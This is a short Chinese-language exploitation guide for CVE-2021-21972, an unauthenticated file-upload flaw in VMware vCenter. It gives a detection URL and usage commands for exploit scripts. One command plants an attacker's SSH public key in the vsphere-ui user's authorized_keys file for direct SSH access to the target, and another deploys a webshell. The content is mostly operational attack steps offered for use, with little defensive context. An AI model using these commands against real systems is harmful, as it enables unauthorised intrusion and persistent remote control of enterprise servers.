一、简述
CVE-2021-21972 vmware vcenter的一个未授权的命令执行漏洞。该漏洞可以上传任意文件到服务器文件目录下。
二、检测
-
基本验证方式:
https://域名/ui/vropspluginui/rest/services/getstatus
-
出现以下结果,即为存在该漏洞
三、POC&EXP
-
POC使用:
- 使用帮助:
python CVE-2021-21972.py -h
- 使用帮助:
-
EXP使用:
- 使用帮助:
python exp.py -h
- 使用示例:
python exp.py -t IP地址 -f id_rsa.pub -p /home/vsphere-ui/.ssh/authorized_keys -o unix
- 使用成功后,直接用主机对目标主机进行ssh直连
- 使用帮助:
-
EXP-WebShell使用:
- 使用帮助:
python CVE-2021-21972.py -h
- 使用示例:
python CVE-2021-21972.py -u https://~~~~
- 使用帮助:
四、Webshell利用
五、参考资料
- 大佬笔记:传送门